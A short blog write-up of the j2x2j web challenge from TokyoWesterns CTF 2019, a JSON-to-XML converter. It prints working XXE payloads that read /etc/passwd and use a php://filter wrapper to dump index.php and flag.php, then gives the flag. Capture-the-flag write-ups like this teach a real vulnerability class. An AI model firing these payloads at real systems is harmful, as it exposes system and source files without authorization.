j2x2j TokyoWesterns CTF 5th 2019

Recently, our team wanted to improve CTFtime's rankings so they worked harder, and this time it was TokyoWesterns CTF, the following is the write up of j2x2j web challenge!

    Link: http://j2x2j.chal.ctf.westerns.tokyo/


At the gance, I saw this word : "JSON <-> XML Converter" in the title. Obviously, I would immediately think of XXE.

Back to the site's interface, there are 2 boxes, a json format box, and an xml format box. By using the following payload, we can determine if it is really a XXE vulnerability or not.

<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>
<root>&test;</root>

Put this payload and boom!


Later, I found that the site was written by PHP, and in may poison repository, there were weapons available to solve this problem :) I used PHP wrapper inside XXE

<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<contacts>
  <contact>
    <name>lnlinh31 &xxe; </name>
  </contact>
</contacts>





Looking at the first line of index.php, you know what to do?

<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=flag.php"> ]>
<contacts>
  <contact>
    <name>lnlinh31 &xxe; </name>
  </contact>
</contacts>


Flag: TWCTF{t1ny_XXE_st1ll_ex1sts_everywhere}


Hope this article makes you satisfied, thanks for watching :)
Share:

1 nhận xét:

  1. What leads you to use php://filter/... ? From where can I learn this? How is that called?

    Trả lờiXóa